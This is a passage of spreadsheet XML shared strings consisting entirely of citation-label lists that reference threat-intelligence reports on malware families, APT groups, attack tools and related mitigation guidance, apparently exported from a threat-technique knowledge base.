    <t>(Citation: FireEye APT28),(Citation: Symantec Naid June 2012),(Citation: Check Point Sunburst Teardrop December 2020),(Citation: Talos ZxShell Oct 2014),(Citation: ESET InvisiMole June 2018),(Citation: Nccgroup Emissary Panda May 2018),(Citation: ESET OceanLotus Mar 2019),(Citation: KISA Operation Muzabi),(Citation: Cybereason Valak May 2020),(Citation: Trend Micro njRAT 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Prevailion EvilNum May 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: AADInternals Documentation),(Citation: Intel 471 REvil March 2020),(Citation: Cylance Shell Crew Feb 2017),(Citation: Talos PoetRAT April 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Crowdstrike Indrik November 2018),(Citation: ProofPoint Ursnif Aug 2016),(Citation: ESET Gelsemium June 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET RTM Feb 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: ESET TeleBots Oct 2018),(Citation: Symantec Darkmoon Aug 2005),(Citation: Fidelis njRAT June 2013),(Citation: Medium KONNI Jan 2020),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: US-CERT TA18-074A),(Citation: CrowdStrike Grim Spider May 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: FireEye Metamorfo Apr 2018),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Trustwave Pillowmint June 2020),(Citation: Symantec Nerex May 2012),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Trend Micro Conficker),(Citation: Riskiq Remcos Jan 2018),(Citation: Trend Micro Waterbear December 2019),(Citation: Profero APT27 December 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: Symantec Catchamas April 2018),(Citation: Kaspersky WIRTE November 2021),(Citation: CERT-FR PYSA April 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: McAfee Sodinokibi October 2019),(Citation: Unit 42 Valak July 2020),(Citation: CME Github September 2018),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Rancor Unit42 June 2018),(Citation: Accenture HyperStack October 2020),(Citation: SentinelOne Valak June 2020),(Citation: US-CERT BADCALL),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Palo Alto Rover),(Citation: Talos Lokibot Jan 2021),(Citation: Symantec Volgmer Aug 2014),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Microsoft Reg),(Citation: Medium Metamorfo Apr 2020),(Citation: TrendMicro Netwalker May 2020),(Citation: FireEye APT32 May 2017),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: FireEye Shamoon Nov 2016),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: PaloAlto NanoCore Feb 2016),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: FireEye APT30),(Citation: ESET Grandoreiro April 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Malwarebytes DarkComet March 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Unit 42 Inception November 2018),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: McAfee Honeybee),(Citation: SANS Conficker),(Citation: Check Point Warzone Feb 2020),(Citation: Symantec Waterbug Jun 2019),(Citation: Tarrask scheduled task),(Citation: NCC Group WastedLocker June 2020),(Citation: CERT-EE Gamaredon January 2021),(Citation: ESET Turla Mosquito Jan 2018),(Citation: McAfee Shamoon December 2018),(Citation: Group IB APT 41 June 2021),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Microsoft NICKEL December 2021),(Citation: GitHub QuasarRAT),(Citation: ESET Attor Oct 2019),(Citation: Cybereason Clop Dec 2020),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Kaspersky TajMahal April 2019),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Red Canary Qbot),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: GDATA Zeus Panda June 2017),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Gh0stRAT ATT March 2019),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: Kaspersky Regin),(Citation: Talos Cobalt Strike September 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Cylance Sodinokibi July 2019),(Citation: US-CERT TYPEFRAME June 2018),(Citation: BlackBerry Amadey 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: CIRCL PlugX March 2013),(Citation: FOX-IT May 2016 Mofang),(Citation: IBM MegaCortex),(Citation: ESET PipeMon May 2020),(Citation: FireEye APT38 Oct 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: US-CERT Bankshot Dec 2017),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Group IB Ransomware September 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: ESET InvisiMole June 2020),(Citation: ESET LoJax Sept 2018),(Citation: Symantec Hydraq Jan 2010),(Citation: Group IB Silence Sept 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Talos TinyTurla September 2021),</t>
  </si>
  <si>
    <t>,(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)</t>
  </si>
  <si>
    <t>(Citation: Mandiant - Synful Knock),(Citation: Cisco Synful Knock Evolution),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)</t>
  </si>
  <si>
    <t>(Citation: Alienvault Sykipot DOD Smart Cards),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: KISA Operation Muzabi),(Citation: FoxIT Wocao December 2019),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: MFA Fatigue Attacks - PortSwigger)</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap),(Citation: Lazarus APT January 2022),(Citation: FireEye APT17),(Citation: Unit 42 Valak July 2020),(Citation: Talos MuddyWater May 2019),(Citation: FireEye APT41 March 2020),(Citation: FireEye APT30),(Citation: Cybereason Bazar July 2020),(Citation: Zscaler Bazar September 2020),(Citation: Chaos Stolen Backdoor),</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020),(Citation: Check Point APT34 April 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Symantec Cicada November 2020),(Citation: Trend Micro njRAT 2018),(Citation: SecureList Silence Nov 2017),(Citation: Proofpoint Bumblebee April 2022),(Citation: Joe Sec Trickbot),(Citation: Intel 471 REvil March 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: ESET Gelsemium June 2021),(Citation: Lazarus APT January 2022),(Citation: Kaspersky Lab SynAck May 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Trusteer Carberp October 2010),(Citation: TrendMicro Taidoor),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET RTM Feb 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: McAfee Bankshot),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Medium Babuk February 2021),(Citation: FireEye Hancitor),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Trustwave Pillowmint June 2020),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cisco CaddyWiper March 2022),(Citation: IronNet BlackTech Oct 2021),(Citation: Cycraft Chimera April 2020),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: FireEye NETWIRE March 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Trend Micro Waterbear December 2019),(Citation: Profero APT27 December 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: FireEye Ursnif Nov 2017),(Citation: Fortinet Diavol July 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Novetta Winnti April 2015),(Citation: Lastline PlugX Analysis),(Citation: Trend Micro KillDisk 1),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Accenture HyperStack October 2020),(Citation: FireEye FIN7 Oct 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: BiZone Lizar May 2021),(Citation: ESET Bad Rabbit),(Citation: Malwarebytes Pony April 2016),(Citation: cobaltstrike manual),(Citation: Mcafee Clop Aug 2019),(Citation: Talos Lokibot Jan 2021),(Citation: Qualys LolZarus),(Citation: ESET Turla PowerShell May 2019),(Citation: CrowdStrike Ryuk January 2019),(Citation: Cyble Egregor Oct 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: XAgentOSX 2017),(Citation: Checkpoint IndigoZebra July 2021),(Citation: ESET LightNeuron May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Cybereason Conti Jan 2021),(Citation: TrendMicro Netwalker May 2020),(Citation: Check Point Meteor Aug 2021),(Citation: Talos Group123),(Citation: Securelist APT10 March 2021),(Citation: wardle evilquest partii),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: CheckPoint Naikon May 2020),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: McAfee Honeybee),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Cyphort EvilBunny Dec 2014),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Zscaler Higaisa 2020),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: McAfee Sharpshooter December 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET Attor Oct 2019),(Citation: ESET DazzleSpy Jan 2022),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: objective-see windtail2 jan 2019),(Citation: Cybereason Clop Dec 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ASERT InnaputRAT April 2018),(Citation: McAfee Cuba April 2021),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Gh0stRAT ATT March 2019),(Citation: S2 Grupo TrickBot June 2017),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: Juniper IcedID June 2020),(Citation: Objective-See MacMa Nov 2021),(Citation: Checkpoint Dridex Jan 2021),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: GitHub Bloodhound),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Microsoft Actinium February 2022),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: BlackBerry Amadey 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Hornet Security Avaddon June 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: IBM MegaCortex),(Citation: ATT QakBot April 2021),(Citation: ESET PipeMon May 2020),(Citation: Group IB GrimAgent July 2021),(Citation: Unit42 BendyBear Feb 2021),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: CarbonBlack Conti July 2020),(Citation: McAfee Lazarus Jul 2020),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET InvisiMole June 2020),(Citation: McAfee Babuk February 2021),(Citation: Forcepoint Monsoon),(Citation: McAfee Maze March 2020),(Citation: Group IB Silence Sept 2018),(Citation: Talos TinyTurla September 2021),(Citation: win10_asr),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>,(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - AAA)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>(Citation: Antiy CERT Ramsay April 2020),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub PoshC2),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Talos ZxShell Oct 2014),(Citation: BitDefender Chafer May 2020),(Citation: GitHub Pupy),(Citation: Eset Ramsay May 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Gigamon Berserk Bear October 2021),(Citation: Palo Alto Black-T October 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Symantec Suckfly May 2016),(Citation: Invincea XTunnel),(Citation: Cisco Talos Intelligence Group),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Peirates GitHub),(Citation: Talos Cobalt Strike September 2020),(Citation: Symantec Leafminer July 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Baumgartner Naikon 2015),(Citation: SecTools nbtscan June 2003),(Citation: TrendMicro TropicTrooper 2015),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye APT41 Aug 2019),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Github PowerShell Empire),(Citation: Talos Rocke August 2018),(Citation: CERT-FR PYSA April 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: FireEye FIN6 April 2016),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Github Koadic),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: SANS Conficker),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: FireEye APT39 Jan 2019),(Citation: Securelist DarkVishnya Dec 2018),(Citation: ESET Industroyer),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: Debian nbtscan Nov 2019),(Citation: Unit42 Emissary Panda May 2019),(Citation: FireEye Periscope March 2018),(Citation: Anomali Rocke March 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ANSSI Sandworm January 2021),(Citation: Unit42 Xbash Sept 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Symantec Palmerworm Sep 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: ESET InvisiMole June 2020),(Citation: Dell TG-3390),(Citation: cobaltstrike manual),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: McAfee Cuba April 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: BitDefender Chafer May 2020),(Citation: GitHub Pupy),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Eset Ramsay May 2020),(Citation: NCC Group Fivehands June 2021),(Citation: NTT Security Flagpro new December 2021),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: Trend Micro Qakbot May 2020),(Citation: NCC Group Team9 June 2020),(Citation: Mandiant APT1),(Citation: TrendMicro TropicTrooper 2015),(Citation: Fortinet Diavol July 2021),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Symantec Sowbug Nov 2017),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Crowdstrike Indrik November 2018),(Citation: Github PowerShell Empire),(Citation: Symantec Orangeworm April 2018),(Citation: Arxiv Avaddon Feb 2021),(Citation: Bitdefender Trickbot March 2020),(Citation: Microsoft Actinium February 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Github Koadic),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CIRCL PlugX March 2013),(Citation: CME Github September 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: Securelist Sofacy Feb 2018),(Citation: Securelist DarkVishnya Dec 2018),(Citation: FireEye FiveHands April 2021),(Citation: Savill 1999),(Citation: FoxIT Wocao December 2019),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: FireEye Periscope March 2018),(Citation: US-CERT TA18-074A),(Citation: TrendMicro Tonto Team October 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Group IB APT 41 June 2021),(Citation: Kaspersky QakBot September 2021),(Citation: Symantec Buckeye),(Citation: ESET Bad Rabbit),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ESET Trickbot Oct 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: Mcafee Clop Aug 2019),(Citation: NCC Group Chimera January 2021),(Citation: Windows Anonymous Enumeration of SAM Accounts)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: GitHub PoshC2),(Citation: FireEye MESSAGETAP October 2019),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: Kaspersky Regin),(Citation: SecTools nbtscan June 2003),(Citation: CISA AA20-301A Kimsuky),(Citation: GitHub Responder),(Citation: ESET Telebots Dec 2016),(Citation: Github PowerShell Empire),(Citation: Impacket Tools),(Citation: Symantec Elfin Mar 2019),(Citation: Leonardo Turla Penquin May 2020),(Citation: Securelist DarkVishnya Dec 2018),(Citation: MSTIC FoggyWeb September 2021),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Debian nbtscan Nov 2019),(Citation: Kaspersky Turla Penquin December 2014),(Citation: Trend Micro Banking Malware Jan 2019),</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap),(Citation: Unit 42 PingPull Jun 2022),(Citation: Bitdefender Naikon April 2021),(Citation: Palo Alto Reaver Nov 2017),(Citation: Proofpoint TA505 October 2019),(Citation: CISA WellMail July 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Gh0stRAT ATT March 2019),(Citation: Scarlet Mimic Jan 2016),(Citation: NSA/FBI Drovorub August 2020),(Citation: Profero APT27 December 2020),(Citation: Aquino RARSTONE),(Citation: Kaspersky Regin),(Citation: FireEye APT32 May 2017),(Citation: Talos Cobalt Strike September 2020),(Citation: Talos Bisonal Mar 2020),(Citation: JPCert BlackTech Malware September 2019),(Citation: Unit 42 NETWIRE April 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Microsoft HAFNIUM March 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: FireEye APT30),(Citation: Trend Micro FIN6 October 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: FireEye APT29 Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Palo Alto MoonWind March 2017),(Citation: CheckPoint Naikon May 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Mythc Documentation),(Citation: Novetta Winnti April 2015),(Citation: Check Point Warzone Feb 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Microsoft PLATINUM June 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: ESET PipeMon May 2020),(Citation: Kaspersky ProjectSauron Full Report),(Citation: FireEye admin@338),(Citation: CheckPoint Bandook Nov 2020),(Citation: FoxIT Wocao December 2019),(Citation: FireEye FiveHands April 2021),(Citation: Cylance Dust Storm),(Citation: Umbreon Trend Micro),(Citation: Intezer HiddenWasp Map 2019),(Citation: Cyberreason Anchor December 2019),(Citation: ESET Carbon Mar 2017),(Citation: Symantec Remsec IOCs),(Citation: Kaspersky Turla Penquin December 2014),(Citation: Kaspersky QakBot September 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Chronicle Winnti for Linux May 2019),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: ESET InvisiMole June 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: Dell TG-3390),(Citation: Fidelis Turbo),(Citation: Check Point Pay2Key November 2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: Kaspersky Transparent Tribe August 2020),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Talos ZxShell Oct 2014),(Citation: NCSC Cyclops Blink February 2022),(Citation: Group IB Silence Sept 2018),(Citation: CISA WellMail July 2020),(Citation: NCSC APT29 July 2020),(Citation: Novetta Blockbuster RATs),(Citation: ESET OceanLotus Mar 2019),(Citation: S2 Grupo TrickBot June 2017),(Citation: Novetta Blockbuster),(Citation: Trustwave GoldenSpy June 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Trend Micro njRAT 2018),(Citation: Talos GravityRAT),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky WIRTE November 2021),(Citation: US-CERT HARDRAIN March 2018),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Palo Alto MoonWind March 2017),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Trend Micro Totbrick Oct 2016),(Citation: Symantec Elfin Mar 2019),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: ESET RTM Feb 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: ESET BlackEnergy Jan 2016),(Citation: Securelist DarkVishnya Dec 2018),(Citation: FoxIT Wocao December 2019),(Citation: Talos Emotet Jan 2019),(Citation: Unit42 BendyBear Feb 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: FireEye FIN7 Aug 2018),(Citation: Anomali Rocke March 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye TRITON 2019),(Citation: Bitdefender StrongPity June 2020),(Citation: Fidelis TrickBot Oct 2016),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: US-CERT BADCALL),(Citation: ESET DazzleSpy Jan 2022),(Citation: Fidelis Turbo),(Citation: FireEye Metamorfo Apr 2018),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Periscope March 2018),(Citation: Cybereason Oceanlotus May 2017),(Citation: TrendMicro Tonto Team October 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: BitDefender Chafer May 2020),(Citation: Novetta-Axiom),(Citation: ESET Sednit Part 2),(Citation: DOJ GRU Indictment Jul 2018),(Citation: FireEye APT40 March 2019),(Citation: Symantec Sowbug Nov 2017),(Citation: Kaspersky Poseidon Group),(Citation: Symantec Dragonfly),(Citation: Symantec Suckfly May 2016),(Citation: F-Secure The Dukes),(Citation: FireEye CARBANAK June 2017),(Citation: Microsoft WDigest Mit),(Citation: win10_asr),(Citation: Microsoft LSA),(Citation: Microsoft Replication ACL),(Citation: GitHub SHB Credential Guard),(Citation: AdSecurity DCSync Sept 2015),(Citation: Microsoft Protected Users Security Group),(Citation: Microsoft Disable NTLM Nov 2012),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Credential Guard)</t>
  </si>
  <si>
    <t>(Citation: GitHub LaZagne Dec 2018),</t>
  </si>
  <si>
    <t>(Citation: Symantec MuddyWater Dec 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Symantec Leafminer July 2018),(Citation: Mandiant APT1),(Citation: GitHub LaZagne Dec 2018),(Citation: ESET Okrum July 2019),(Citation: GitHub Pupy),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT34 July 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: FireEye APT35 2018),(Citation: FireEye APT33 Guardrail),(Citation: Tilbury Windows Credentials),(Citation: Microsoft Protected Users Security Group)</t>
  </si>
  <si>
    <t>(Citation: GitHub Mimikatz lsadump Module),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Microsoft 365 Defender Solorigate),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: NCSC Joint Report Public Tools),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: FoxIT Wocao December 2019),(Citation: Deply Mimikatz),(Citation: Microsoft Replication ACL),(Citation: ADSecurity Mimikatz DCSync)</t>
  </si>
  <si>
    <t>(Citation: TrueSec Gsecdump),(Citation: GitHub Pupy),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Github AD-Pentest-Script),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: F-Secure The Dukes),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Symantec MuddyWater Dec 2018),(Citation: Symantec Leafminer July 2018),(Citation: GitHub LaZagne Dec 2018),(Citation: AADInternals Documentation),(Citation: FireEye APT35 2018),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Impacket Tools),(Citation: NCC Group APT15 Alive and Strong),(Citation: CME Github September 2018),(Citation: Symantec Elfin Mar 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: GitHub Mimikatz lsadump Module),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: NCSC Joint Report Public Tools),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Core Security Impacket),(Citation: FireEye APT34 July 2019),(Citation: Dell TG-3390),(Citation: CrowdStrike IceApple May 2022),(Citation: Tilbury Windows Credentials)</t>
  </si>
  <si>
